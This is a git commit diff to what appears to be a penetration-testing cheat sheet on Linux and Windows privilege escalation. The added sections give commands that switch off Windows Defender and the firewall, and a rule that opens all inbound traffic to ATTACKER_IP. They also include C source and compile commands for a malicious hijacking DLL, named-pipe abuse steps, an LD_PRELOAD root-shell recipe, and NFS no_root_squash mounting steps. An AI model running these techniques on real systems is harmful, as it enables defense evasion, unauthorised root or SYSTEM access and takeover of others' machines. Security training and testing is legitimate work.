Windows Firewall + DLL hijacking + Named pipes

2024-12-18 18:36:10 +00:00 · 2020-02-01 22:12:36 +01:00 · 2020-02-01 22:12:36 +01:00 · fb76fdc331
commit fb76fdc331
parent 8a19532f27
3 changed files with 102 additions and 46 deletions
--- a/Resources/Linux
+++ b/Resources/Linux
@ -1,5 +1,49 @@
 # Linux - Privilege Escalation

+## Summary
+
+* [Tools](#tools)
+* [Checklist](#checklists)
+* [Looting for passwords](#looting-for-passwords)
+    * [Files containing passwords](#files-containing-passwords)
+    * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
+    * [Last edited files](#last-edited-files)
+    * [In memory passwords](#in-memory-passwords)
+    * [Find sensitive files](#find-sensitive-files)
+* [Scheduled tasks](#scheduled-tasks)
+    * [Cron jobs](#cron-jobs)
+    * [Systemd timers](#systemd-timers)
+* [SUID](#suid)
+    * [Find SUID binaries](#find-suid-binaries)
+    * [Create a SUID binary](#create-a-suid-binary)
+* [Capabilities](#capabilities)
+    * [List capabilities of binaries](#list-capabilities-of-binaries)
+    * [Edit capabilities](#edit-capabilities)
+    * [Interesting capabilities](#interesting-capabilities)
+* [SUDO](#sudo)
+    * [NOPASSWD](#nopasswd)
+    * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd)
+    * [Doas](#doas)
+    * [sudo_inject](#sudo-inject)
+* [GTFOBins](#gtfobins)
+* [Wildcard](#wildcard)
+* [Writable files](#writable-files)
+    * [Writable /etc/passwd](#writable-etcpasswd)
+    * [Writable /etc/sudoers](#writable-etcsudoers)
+* [NFS Root Squashing](#nfs-root-squashing)
+* [Shared Library](#shared-library)
+    * [ldconfig](#ldconfig)
+    * [RPATH](#rpath)
+* [Groups](#groups)
+    * [Docker](#docker)
+    * [LXC/LXD](#lxclxd)
+* [Kernel Exploits](#kernel-exploits)
+    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
+    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
+    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
+    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
+
+
 ## Tools

 - [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration)
@ -22,47 +66,6 @@
 - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
 - [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER)

-## Summary
-
-* [Checklist](#checklists)
-* [Looting for passwords](#looting-for-passwords)
-    * [Files containing passwords](#files-containing-passwords)
-    * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
-    * [Last edited files](#last-edited-files)
-    * [In memory passwords](#in-memory-passwords)
-    * [Find sensitive files](#find-sensitive-files)
-* [Scheduled tasks](#scheduled-tasks)
-    * [Cron jobs](#cron-jobs)
-    * [Systemd timers](#systemd-timers)
-* [SUID](#suid)
-    * [Find SUID binaries](#find-suid-binaries)
-    * [Create a SUID binary](#create-a-suid-binary)
-* [Capabilities](#capabilities)
-    * [List capabilities of binaries](#list-capabilities-of-binaries)
-    * [Edit capabilities](#edit-capabilities)
-    * [Interesting capabilities](#interesting-capabilities)
-* [SUDO](#sudo)
-    * [NOPASSWD](#nopasswd)
-    * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd)
-    * [Doas](#doas)
-    * [sudo_inject](#sudo-inject)
-* [GTFOBins](#gtfobins)
-* [Wildcard](#wildcard)
-* [Writable files](#writable-files)
-    * [Writable /etc/passwd](#writable-etcpasswd)
-    * [Writable /etc/sudoers](#writable-etcsudoers)
-* [NFS Root Squashing](#nfs-root-squashing)
-* [Shared Library](#shared-library)
-    * [ldconfig](#ldconfig)
-    * [RPATH](#rpath)
-* [Groups](#groups)
-    * [Docker](#docker)
-    * [LXC/LXD](#lxclxd)
-* [Kernel Exploits](#kernel-exploits)
-    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
-    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
-    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
-    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)

 ## Checklists

@ -356,7 +359,7 @@ If `LD_PRELOAD` is explicitly defined in the sudoers file
 Defaults        env_keep += LD_PRELOAD
 ```

-Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
+Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`

 ```powershell
 #include <stdio.h>
@ -370,7 +373,7 @@ void _init() {
 }
 ```

-Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find`
+Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=<full_path_to_so_file> <program>`, e.g: `sudo LD_PRELOAD=/tmp/shell.so find`

 ### Doas

@ -478,14 +481,17 @@ echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers

 ## NFS Root Squashing

-When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
+When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it.

 ```powershell
+# remote check the name of the folder
+showmount -e 10.10.10.10
+
 # create dir
 mkdir /tmp/nfsdir  

 # mount directory 
-mount -t nfs 10.10.10.10:/shared /tmp/nfsdir 
+mount -t nfs 10.10.10.10:/shared /tmp/nfsdir    
 cd /tmp/nfsdir

 # copy wanted shell 
@ -690,3 +696,4 @@ https://www.exploit-db.com/exploits/18411
 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -3,6 +3,8 @@
 ## Summary

 * [Tools](#tools)
+* [Disable Windows Defender](#disable-windows-defender)
+* [Disable Windows Firewall](#disable-windows-firewall)
 * [Userland](#userland)
    * [Registry](#registry)
    * [Startup](#startup)
@ -19,6 +21,24 @@

 - [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)

+## Disable Windows Defender
+
+```powershell
+sc config WinDefend start= disabled
+sc stop WinDefend
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+## Disable Windows Firewall
+
+```powershell
+Netsh Advfirewall show allprofiles
+NetSh Advfirewall set allprofiles state off
+
+# ip whitelisting
+New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
+```
+
 ## Userland

 Set a file as hidden
--- a/Resources/Windows
+++ b/Resources/Windows
@ -20,6 +20,7 @@
 * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
 * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
 * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
+* [EoP - Named Pipes](#eop---named-pipes)
 * [EoP - Kernel Exploitation](#eop---kernel-exploitation)
 * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
@ -470,6 +471,26 @@ dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
 Often, services are pointing to writeable locations:
 - Orphaned installs, not installed anymore but still exist in startup
 - DLL Hijacking
+    ```powershell
+    # find missing DLL 
+    - Find-PathDLLHijack PowerUp.ps1
+    - Process Monitor : check for "Name Not Found"
+
+    # compile a malicious dll
+    - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+    - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+
+    # content of windows_dll.c
+    #include <windows.h>
+    BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+        if (dwReason == DLL_PROCESS_ATTACH) {
+            system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
+            ExitProcess(0);
+        }
+        return TRUE;
+    }
+    ```
+
 - PATH directories with weak permissions

 ```powershell
@ -605,6 +626,13 @@ For `C:\Program Files\something\legit.exe`, Windows will try the following paths
 - `C:\Program.exe`
 - `C:\Program Files.exe`

+## EoP - Named Pipes
+
+1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")`
+2. Check named pipes DACL: `pipesec.exe <named_pipe>`
+3. Reverse engineering software
+4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`
+

 ## EoP - Kernel Exploitation

@ -949,4 +977,5 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
 * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
 * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
 * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
-* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
+* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)